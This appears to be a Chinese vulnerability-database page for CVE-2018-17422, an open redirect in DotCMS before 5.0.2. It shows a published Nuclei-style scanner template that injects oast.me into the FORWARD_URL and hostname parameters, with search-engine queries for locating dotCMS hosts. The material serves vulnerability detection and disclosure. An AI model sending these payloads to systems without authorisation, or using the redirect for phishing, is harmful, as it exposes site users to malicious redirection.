CVE-2018-17422: DotCMS < 5.0.2 - Open Redirect

日期: 2025-08-01 | 影响软件: DotCMS | POC: 已公开

漏洞描述

dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2018-17422

info:
  name: DotCMS < 5.0.2 - Open Redirect
  author: 0x_Akoko,daffainfo
  severity: medium
  description: |
    dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability.
  reference:
    - https://github.com/dotCMS/core/issues/15286
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17422
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-17422
    cwe-id: CWE-601
    epss-score: 0.06141
    epss-percentile: 0.90457
    cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dotcms
    product: dotcms
    shodan-query:
      - http.title:"dotCMS"
      - http.title:"dotcms"
    fofa-query: title="dotcms"
    google-query: intitle:"dotcms"
  tags: cve2018,cve,redirect,dotcms

http:
  - method: GET
    path:
      - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me'
      - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "self.location = 'http://oast.me'"
          - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"
# digest: 4b0a00483046022100b5067cba1a4ef89cb24b475519a4cfbbe5b49ad1acff822c9fb2f39e1fed0e73022100d7f064ee769397479123972c1dadb29aa91743ad946925a3ebc53e415cd46f89:922c64590222798bb761d5b6d8e72950

相关漏洞推荐